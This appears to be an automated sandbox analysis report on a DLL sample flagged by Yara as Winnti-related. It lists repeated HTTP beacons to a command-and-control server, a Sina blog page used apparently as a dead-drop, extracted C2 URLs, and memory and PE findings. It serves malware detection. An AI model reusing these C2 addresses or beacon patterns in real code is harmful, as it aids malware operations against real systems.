Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /main.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.56.236:18963Cache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: blog.sina.com.cn
Source: rundll32.exe, 0000000B.00000002.3145175231.000000000533D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.110:1530/u1129.html
Source: rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.110:18530/u1129.html
Source: rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.110:18530/u1129.htmlO
Source: rundll32.exe, rundll32.exe, 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmp, 4hSuRTwnWJ.dllString found in binary or memory: http://107.163.56.235:18530/
Source: rundll32.exe, 0000000B.00000002.3139060797.00000000032DA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.235:18530//joy.asp?sid=rungnejcodjgn0uWFe5vteX8v2LUicbtudb8mteZmdeYndG
Source: rundll32.exe, rundll32.exe, 0000000E.00000002.1844601642.0000000010012000.00000040.00000001.01000000.00000003.sdmp, 4hSuRTwnWJ.dllString found in binary or memory: http://107.163.56.236:18963/main.php
Source: rundll32.exe, 0000000B.00000002.3148297250.00000000068EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.php)jR
Source: rundll32.exe, 0000000B.00000003.3030027230.00000000068EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3148297250.00000000068EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.php3jT
Source: rundll32.exe, 0000000B.00000003.2316425309.00000000068A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.php=
Source: rundll32.exe, 0000000B.00000003.3010452322.00000000068EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3030027230.00000000068EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3148297250.00000000068EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.php?j
Source: rundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpA
Source: rundll32.exe, 0000000B.00000002.3146336861.0000000005F3D000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3146507233.000000000615A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpC:
Source: rundll32.exe, 0000000B.00000002.3139060797.0000000003365000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpGUu
Source: rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpJ
Source: rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpO
Source: rundll32.exe, 0000000B.00000002.3148297250.00000000068EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpOjp
Source: rundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpU
Source: rundll32.exe, 0000000B.00000003.2316425309.00000000068A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpY
Source: rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpa
Source: rundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpi
Source: rundll32.exe, 0000000B.00000003.3030027230.00000000068EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpmj
Source: rundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpni
Source: rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpniu
Source: rundll32.exe, 0000000B.00000003.1991942961.000000000337E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpo
Source: rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpow
Source: rundll32.exe, 0000000B.00000003.1991942961.000000000337E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpq
Source: rundll32.exe, 0000000B.00000003.3030027230.00000000068EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpwj
Source: rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.56.236:18963/main.phpz
Source: rundll32.exe, 0000000B.00000003.2163776228.0000000006845000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2163718642.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930644848.0000000004D5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2163751722.000000000684B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://beacon.sina.com.cn/a.gif?noScript
Source: rundll32.exe, 0000000B.00000003.2163776228.0000000006845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.c
Source: rundll32.exe, 0000000B.00000002.3143520519.0000000005103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%s
Source: rundll32.exe, 0000000B.00000002.3143520519.0000000005103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%s-
Source: rundll32.exe, 0000000B.00000002.3143520519.0000000005103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%sI
Source: rundll32.exe, 0000000B.00000002.3143520519.0000000005103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%se
Source: rundll32.exe, 0000000B.00000003.2163751722.000000000684B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093
Source: rundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093#
Source: rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093.
Source: rundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/57624790931
Source: rundll32.exe, 0000000B.00000003.1991942961.000000000337E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/57624790937
Source: rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093G
Source: rundll32.exe, 0000000B.00000003.3010452322.00000000068EC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3030027230.00000000068EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093Ojp
Source: rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093i
Source: rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5762479093ni
Source: rundll32.exe, 0000000B.00000003.2910772611.000000000338B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
Source: rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.11.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 0000000B.00000003.2910772611.000000000337C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b46a1f482
Source: rundll32.exe, 0000000B.00000003.2163776228.0000000006845000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2163718642.0000000004D57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930644848.0000000004D5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930575176.000000000650D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2163751722.000000000684B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://portrait6.sinaimg.cn/5762479093/blog/180
Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
Source: rundll32.exe, 0000000B.00000002.3139060797.0000000003323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/
Source: rundll32.exe, 0000000B.00000002.3139060797.000000000338A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093
Source: rundll32.exe, 0000000B.00000003.2910772611.000000000338B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1991942961.000000000337E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3139060797.000000000338A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093-
Source: rundll32.exe, 0000000B.00000003.2316425309.00000000068A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3148297250.0000000006890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093/
Source: rundll32.exe, 0000000B.00000002.3148297250.00000000068D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093State
Source: rundll32.exe, 0000000B.00000002.3139060797.000000000333D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093i
Source: rundll32.exe, 0000000B.00000003.2889879555.000000000694C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093ion
Source: rundll32.exe, 0000000B.00000003.2293898396.00000000068F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5762479093plication
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50130
Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50126
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
Source: unknownNetwork traffic detected: HTTP traffic on port 50126 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:49856 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:49937 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:49989 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:50041 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:50085 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:50108 version: TLS 1.2
Source: unknownHTTPS traffic detected: 116.133.8.92:443 -> 192.168.2.7:50120 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 4hSuRTwnWJ.dll, type: SAMPLEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 14.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 7.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
Source: 11.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPEMatched rule: Winnti sample - file NlaifSvc.dll Author: Florian Roth
PE file has a writeable .text section
Source: 4hSuRTwnWJ.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 70C50000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 71C20000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 72BF0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 778A0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 745C0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73E90000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74EC0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 701A0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 70300000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 70420000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73C60000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75440000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76220000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73BC0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73D60000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74090000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74160000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75890000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 77620000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 70520000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 705D0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 741E0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 742F0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 750C0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 759B0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76320000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76480000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 770B0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 70140000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 702A0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 70620000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 73DE0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74110000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74230000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74DB0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 74DF0000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75110000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 75370000 page read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 753D0000 page read and writeJump to behavior
